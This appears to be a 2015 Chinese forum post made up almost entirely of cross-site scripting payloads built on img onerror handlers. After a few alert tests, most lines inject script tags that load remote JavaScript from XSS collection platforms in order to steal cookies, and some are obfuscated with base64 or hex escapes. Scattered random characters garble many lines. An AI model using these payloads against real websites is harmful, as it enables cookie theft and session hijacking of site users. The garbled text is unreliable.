<img src='non-exist.jpg'onerror="alert('xss')">+ r9 ]- G) _( l0 f
<img src=# onerror=alert(123)>
7 N# p" d/ x g! P4 X<img src=# onerror=alert(document.cookie)>+ W6 w% l) s$ T$ F$ n
下面是利用平台钓cookie的( _ V, m. } U7 a& `$ c, V3 F
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>9 k, w4 m& z1 r- H6 D! F
/ u/ K) z) N8 B; \5 Y" `# V
F2 J2 s( K8 u<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>5 Q4 P! C$ H, ~) }
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>1 ]3 s' i0 f# l, B( e
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
2 i' F: {- @4 Y8 D' }- f; ~<img src=1 onerror=jQuery.getScript("//xss.re/974")>
' Z, }% F3 i: ?4 l3 D2 w) @<img src="#">* ?$ {( Q. n% ^7 @
<img src="#">1 \, B+ i! q k, ~5 m. H
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
: _/ F! k+ a( g& E L3 |% j, g2 b<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
" L3 `3 c* L6 ]4 X/ n<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>% n$ ~% f' L& f+ w8 f
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
" p6 X, O, s& k/ r<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>: E5 V0 q4 p V: n; A( ^& n
<img src=x width="0" height="0"></img>
* W$ L- U4 P$ {4 G* p) b+ p9 P- N<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>9 b& M% h- W# R6 N& W
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
5 ^5 H% x9 T( e) I( a! j5 e6 E |
发表于 2015-10-18 14:33:54
收藏
支持
反对